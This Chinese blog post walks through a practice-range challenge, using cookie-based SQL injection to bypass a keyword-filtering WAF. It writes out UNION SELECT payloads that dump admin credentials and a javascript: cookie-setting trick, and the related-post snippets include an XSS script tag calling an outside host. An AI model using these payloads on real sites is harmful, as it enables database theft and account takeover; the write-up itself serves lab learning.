掌控安全靶场第二章:遇到阻难!绕过WAF过滤!

最新推荐文章于 2024-01-08 21:37:27 发布
最新推荐文章于 2024-01-08 21:37:27 发布
阅读量2.5k 收藏 4
点赞数 1
分类专栏: 网络安全之渗透测试 文章标签: 安全 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/k1k5cn/article/details/109579676
版权

最近在学习CTF,前不久发现一个还不错的靶场
封神台 - 掌控安全在线演练靶场
二话不说,开干吧

第二章:遇到阻难!绕过WAF过滤!

一、测试是否有注入点

附上链接 https://hack.zkaq.cn/battle/target?id=31ac789a52edf9bb
标题上写了是【配套课时:SQL注入攻击原理 实战演练】SQL注入,
随便点击一个新闻。在id=171后面加一个引号’,测试一下是否有SQL注入。
有弹框了,提示过滤了很多关键字。下一步考虑如何绕过这些关键字。
在这里插入图片描述

二、绕过WAF关键字过滤

经过测试,发现只允许==,order by等关键字。通过仔细观察页面,发现应该是网页防护,网页防护就是通过代码验证get或post参数中是否有select等非法的关键字参数,如果有这些非法参数,就调用弹窗提示是非法字符。
知道了是网页防护,我们就换一种注入方式,Cookie进行绕过。
Cookie注入有三种方法:1是可以使用ModHeader插件进行修改Request header。2是用Burpsuite进行抓包修改cookie。3是直接在地址栏构造javascript:alert(document.cookie=“id=”+escape(“169”));

1、ModHeader

从Chrome的应用商店下载插件。打开以后长这个小样子。
在这里插入图片描述
下一步伪造cookie,看是否成功注入。
id=12345+union+select+1,2,3,4,5,6,7,8,9,10+from+admin
在这里插入图片描述
访问时,把地址栏的 " id=167 " 去掉。
猜解用户名和密码字段username,password
id=12345+union+select+1,username,password,4,5,6,7,8,9,10+from+admin
在这里插入图片描述
在线md5解密得出admin密码welcome
用御剑扫描一下网站后台路径
在这里插入图片描述
在这里插入图片描述
成功登陆,拿到flag
在这里插入图片描述

2、Burpsuite抓包

省略……

3、javascript构造

省略……
本人也是小白一枚,有需要的同学的可以在下方留言,我会补充出来同大家交流。

pydra
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
掌控安全学院SQL注入靶场
qaq517384的博客
11-18 3693
总体没啥难度,也没有啥过滤,拿来复健感觉还不错,最后一个宽字节注入又花了点时间研究了一下
封神台--第二章遇到阻难绕过WAF过滤!解题思路
04-12 5559
封神台--第二章遇到阻难绕过WAF过滤!解题思路 一、查找sql注入点 进入测试页面http://59.63.200.79:8004/ 1)字符型、数字型等盲注尝试 随意点开一篇文章,构造单引号',双引号"等闭合查询语句,发现提示如下 网站对请求地址进行了WAF防护,通过测试没有过滤 ==order by、union== 网页防护一般只拦截get、post传参,因此尝试cookie注入 2)cookie注入 cookie注入提交的参数以cookie方式提交,判断步骤 1.找到...
封神台靶场---尤里的复仇Ⅰ小芳!---第二章遇到阻难绕过WAF过滤
qq_44336568的博客
06-28 1475
封神台----尤里的复仇I-第二章遇到阻难绕过WAF过滤!渗透学习、靶场练习
第二章遇到阻难绕过WAF过滤!【SQL注入攻击
野马菲比的博客
07-21 1059
爆破andexists(select*from表名),如果页面返回正常,就存在这个表。exists这个函数就是检查子查询能否查询到数据,如果能会返回一个True。靶场http//kypt8004.ia.aqlab.cn/根据md5的特征,猜测为md5加密;解密为welcome。1、判断是否存在注入,发现有过滤。说明存在admin表。如果不知道字段怎么办?就一个库,无需知道。...
掌控靶场 尤里复仇回归sql-注入绕过防护getshell
sagat110的博客
12-27 548
央企扫地僧重拾渗透,在掌控学院的靶场练习闯关过程中,记录一些心得体会,信息收集、sql注入、弱口令、一句话木马等手段的综合利用,成功拿到flag
掌控靶场sql-注入绕过防护getshell
最新发布
xia_qin的博客
01-08 598
里面有一个flag,刚开始我还比较不相信,抱着试试的心态去给flag,没想到真是这个。这里靶场作者肯定不是这么想的,你们还可以试试照提示说的去做。先看提示,说让我们sql注入,然后获取getshell。我们先开始进行信息收集,这是第一步,也是最重要的一步。使用kali Linux的dirsearch扫描目录。结果找到了一个名叫flag.txt的文件。扫出了好多目录,其中还有后台登录目录。试试找找有没有出错的文件。
WAF绕过的各种方法总结.pdf
07-09
WAF绕过的各种方法总结总结语2019年7月9日,仅供学习参考,请勿用于非法用途
第24天:WEB漏洞-文件上传之WAF绕过安全修复1
08-03
Content-Disposition:一般可更改name:表单参数值,不能更改filename:文件名,可以更改Content-Type:文件 MIME,视情
分块绕过WAF.zip
02-27
这是一个绕过WAF的方法,大家能够学习到如何绕过的方法。能够提升自己的技术水品。
Charset_encoding-Burp:利用字符集编码绕过waf的burpsuite插件
05-18
BurpSuite Plugin通过字符集编码绕过waf的burp插件因为小伙伴在实战中有这么个需求(利用字符集编码绕过waf),所以我借着他的这个需求也学习了下burp插件的编写。预览ASP.NET+IIS使用说明其实这种方法很早就出来了...
第28天:WEB漏洞-XSS跨站之WAF绕过安全修复1
08-03
WEB 漏洞-XSS 跨站之 WAF 绕过安全修复#常规 WAF 绕过思路标签语法替换特殊符号干扰提交方式更改垃圾数据溢出加密解密算法结合其他漏洞绕过#自动化
【封神台 - 掌控安全靶场】尤里的复仇 Ⅰ 小芳!一二三四五六七章
热门推荐
algae
08-14 3万+
【封神台 - 掌控安全靶场】尤里的复仇 小芳!第五章:进击!拿到Web最高权限!【配套课时绕过防护上传木马实战演练】(等级:15) <script src = https://xsspt.com/nxqPZY?1597410463> </ script> cookie : ASPSESSIONIDSQDARATQ=KJFAFKEDEAPPFBEDHJFCIGIC; flag=zkz{xsser-g00d},ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNP
第二章遇到阻难绕过WAF过滤
m0_48294281的博客
01-05 1439
靶场学习心得,欢迎学习交流!
掌控安全第二关记录
haodawei123的博客
01-04 3261
掌控安全第二关记录网址寻找注入点亮点1、使用cookie传参进行注入测试这里的“+”很关键 网址 第二关网址:http://117.41.229.122:8004/ 寻找注入点 点击其中的一个新闻得到网址http://117.41.229.122:8004/shownews.asp?id=171 http://117.41.229.122:8004/shownews.asp?id=171 ord...
获取目标服务器c盘下flag文件信息,公开课基础演练靶场 第六章 webshell控制目标详细解题思路...
weixin_42442653的博客
08-06 1101
我看见第六章的传送门上写着大大的两个字--提权!!在上一章中,我已经通过上传一句话马,用菜刀连接了上传的这个文件,从而得到了后台的部分权限。但是我试过,现在拥有的权限,还不能打开c盘中的文件。而C盘中的文件往往都是比较重要的,因此,我需要提升自己的权限,如下图。进入传送门后,发现这一章的网站仍然是之前看到过的那个。而这个网站的管理员cookie已经被我拿到,并且已经成功上传一句话马至服务器了,如下...
安全练兵场】| BurpSuite靶场系列之身份验证
Ms08067安全实验室
10-18 203
文章来源|MS08067 安全练兵场 知识星球本文作者:godunt(安全练兵场星球合伙人)玩靶场 认准安全练兵场成立"安全练兵场"的目的目前,安全行业热度逐年增加,很多新手安全从业人员在获取技术知识时,会局限于少量的实战中,技术理解得不到升华,只会像个脚本小子照着代码敲命令,遇到实战时自乱阵脚,影响心态的同时却自叹不如。而安全练兵场是由理论知识到实战过渡的一道大门,安全练兵场星球鼓励大家从实战中...
第二章遇到阻难绕过WAF过滤
m0_51195235的博客
12-14 468
第二章遇到阻难绕过WAF过滤
掌控靶场第二章WAF绕过
m0_56135391的博客
04-12 958
1.打开传送门 2.使用御剑或其它网站扫描工具对该页面进行扫描 扫描得到一个管理员登录界面以及疑似含有sql注入漏洞的界面 对该界面进行sql注入测试拼接语句orderby10 页面回显正常,输入order by 11,页面返回异常,验证含有10个字段 通过union拼接,查询是否含有admin表unionselect1,2,3,4,5,6,7,8,9,10fromadmin 页面提示传参错误,url中输入的sql注入语句被waf拦截,可以尝试将注入语句放入coo...
封神台----尤里的复仇I-第二章遇到阻难绕过WAF过滤
正在学习的路上...
07-18 3456
1.找注入点 进去之后,查看新闻,一般在这里有注入点。 输入 ?id=168 and 1=1 过滤了一些关键字,通过测试没有过滤 == order by == 2.猜列数、报显示位 通过测试,发现查询了10列 ?id=171 order by 10 ?id=466454 select 1,2 ------将id设为一个不存在的数,看显示位 3.查看数据库版本和当前数据库名 ?id=1...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值